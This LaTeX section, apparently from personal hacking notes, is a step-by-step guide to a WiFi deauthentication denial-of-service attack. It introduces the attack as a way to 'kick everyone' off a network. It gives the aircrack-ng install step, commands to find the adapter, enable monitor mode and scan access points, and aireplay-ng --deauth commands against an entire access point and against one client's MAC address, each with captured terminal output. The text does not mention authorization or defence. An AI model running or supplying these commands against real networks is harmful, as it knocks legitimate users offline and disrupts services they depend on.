\section{WiFi DoS - Deauthentication frames}
\label{sec:wifi_dos_deauthentication}
\source{https://null-byte.wonderhowto.com/how-to/hack-wi-fi-performing-denial-service-dos-attack-wireless-access-point-0147988/}{null-byte.wonderhowto.com}\\\\
This is very easy way how to kick everyone from \wifi{}. It send's deauthentication frames for every device that is connected, which results it disconnection of device. Nobody will be able to use the \wifi{}. It only requires tools called \name{airodump-ng} and \name{aireplay-ng}.

%========================================================================================
%========================================================================================

\subsection{Installation}
Install \name{aircrack-ng} package.
\begin{quoting}
\name{aircrack-ng} is a set of tools for auditing wireless networks. It's an enhanced/reborn version of aircrack. It consists of \name{airodump-ng} (an 802.11 packet capture program), \name{aireplay-ng} (an 802.11 packet injection program), \name{aircrack} (static \wep{} and \wpa{}-PSK cracking), \name{airdecap-ng} (decrypts \wep{}/\wpa{} capture files), and some tools to handle capture files (merge, convert, etc.).
\end{quoting}

Fedora
\begin{lstlisting}[style=terminal]
sudo dnf install aircrack-ng
\end{lstlisting}

%========================================================================================
%========================================================================================

\subsection{Usage}
To find your wireless adapter.
\begin{lstlisting}[style=terminal]
iwconfig
\end{lstlisting}
\begin{lstlisting}[style=terminal_out]
wlp4s0    IEEE 802.11  ESSID:off/any  
	  Mode:Managed  Access Point: Not-Associated   Tx-Power=16 dBm   
	  Retry short limit:7   RTS thr:off   Fragment thr:off
	  Power Management:off
	  
lo        no wireless extensions.

enp5s0    no wireless extensions.
\end{lstlisting}
In this case the wireless adapter is \name{wlp4s0}.\\
Put the Wireless Adapter in Monitor Mode.
\begin{lstlisting}[style=terminal]
airmon-ng start wlp4s0
\end{lstlisting}
\begin{lstlisting}[style=terminal_out]
Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to run 'airmon-ng check kill'

  PID Name
  854 avahi-daemon
  873 avahi-daemon
  944 NetworkManager
 1017 wpa_supplicant
 1629 dhclient

PHY	Interface	Driver		Chipset

phy0	wlp4s0		iwlwifi		Intel Corporation Centrino Wireless-N 2230 (rev c4)

		(mac80211 monitor mode vif enabled for [phy0]wlp4s0 on [phy0]wlp4s0mon)
		(mac80211 station mode vif disabled for [phy0]wlp4s0)
\end{lstlisting}

Monitor the available \ap{}s with \name{airodump-ng}.
\begin{lstlisting}[style=terminal]
airodump-ng wlp4s0mon
\end{lstlisting}
\begin{lstlisting}[style=terminal_out]	
CH  9 ][ Elapsed: 1 min ][ 2007-04-26 17:41 ][ BAT: 2 hours 10 mins ][ WPA handshake: 00:14:6C:7E:40:80

BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID

00:09:5B:1C:AA:1D   11  16       10        0    0  11  54. OPN              <length: 7>
00:14:6C:7A:41:81   34 100       57       14    1   9  11  WEP  WEP         bigbear
00:14:6C:7E:40:80   32 100      752       73    2   9  54  WPA  TKIP   PSK  teddy

BSSID              STATION            PWR   Rate   Lost   Frames  Probes

00:14:6C:7A:41:81  00:0F:B5:32:31:31   51   11-11     2       14  bigbear
(not associated)   00:14:A4:3F:8D:13   19   11-11     0        4  mossy
00:14:6C:7A:41:81  00:0C:41:52:D1:D1   -1    11-2     0        5  bigbear
00:14:6C:7E:40:80  00:0F:B5:FD:FB:C2   35   36-24     0       99  teddy
\end{lstlisting}

Launch the DoS (on the entire \ap{}) for only 10 frames (specified by \cmd{--deauth 10}).
\begin{lstlisting}[style=terminal]
aireplay-ng --deauth 10 -a 00:09:5B:1C:AA:1D wlp4s0mon
\end{lstlisting}
\begin{lstlisting}[style=terminal_out]
21:15:07  Waiting for beacon frame (BSSID: 00:09:5B:1C:AA:1D) on channel 11
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
21:15:07  Sending DeAuth to broadcast -- BSSID: [00:09:5B:1C:AA:1D]
21:15:07  Sending DeAuth to broadcast -- BSSID: [00:09:5B:1C:AA:1D]
21:15:08  Sending DeAuth to broadcast -- BSSID: [00:09:5B:1C:AA:1D]
21:15:08  Sending DeAuth to broadcast -- BSSID: [00:09:5B:1C:AA:1D]
21:15:09  Sending DeAuth to broadcast -- BSSID: [00:09:5B:1C:AA:1D]
21:15:09  Sending DeAuth to broadcast -- BSSID: [00:09:5B:1C:AA:1D]
21:15:10  Sending DeAuth to broadcast -- BSSID: [00:09:5B:1C:AA:1D]
21:15:10  Sending DeAuth to broadcast -- BSSID: [00:09:5B:1C:AA:1D]
21:15:10  Sending DeAuth to broadcast -- BSSID: [00:09:5B:1C:AA:1D]
21:15:10  Sending DeAuth to broadcast -- BSSID: [00:09:5B:1C:AA:1D]
\end{lstlisting}

Launch against a specific device (give the MAC) for only 10 frames (specified by \cmd{--deauth 10}).
\begin{lstlisting}[style=terminal]
aireplay-ng --deauth 10 -a 00:09:5B:1C:AA:1D -c 00:0F:B5:32:31:31 wlp4s0mon
\end{lstlisting}
\begin{lstlisting}[style=terminal_out]
21:22:02  Waiting for beacon frame (BSSID: 00:09:5B:1C:AA:1D) on channel 11
21:22:02  Sending 64 directed DeAuth. STMAC: [00:0F:B5:32:31:31] [ 1|64 ACKs]
21:22:03  Sending 64 directed DeAuth. STMAC: [00:0F:B5:32:31:31] [36|64 ACKs]
21:22:03  Sending 64 directed DeAuth. STMAC: [00:0F:B5:32:31:31] [ 4|65 ACKs]
21:22:04  Sending 64 directed DeAuth. STMAC: [00:0F:B5:32:31:31] [ 0|64 ACKs]
21:22:04  Sending 64 directed DeAuth. STMAC: [00:0F:B5:32:31:31] [ 0|64 ACKs]
21:22:05  Sending 64 directed DeAuth. STMAC: [00:0F:B5:32:31:31] [ 0|63 ACKs]
21:22:06  Sending 64 directed DeAuth. STMAC: [00:0F:B5:32:31:31] [ 0|64 ACKs]
21:22:06  Sending 64 directed DeAuth. STMAC: [00:0F:B5:32:31:31] [ 0|64 ACKs]
21:22:07  Sending 64 directed DeAuth. STMAC: [00:0F:B5:32:31:31] [ 0|61 ACKs]
21:22:07  Sending 64 directed DeAuth. STMAC: [00:0F:B5:32:31:31] [ 0|64 ACKs]
\end{lstlisting}

%========================================================================================
%========================================================================================

\subsection{Conclusion}
It is very easy to use.\\
From experience, it sends 2 frames per second.



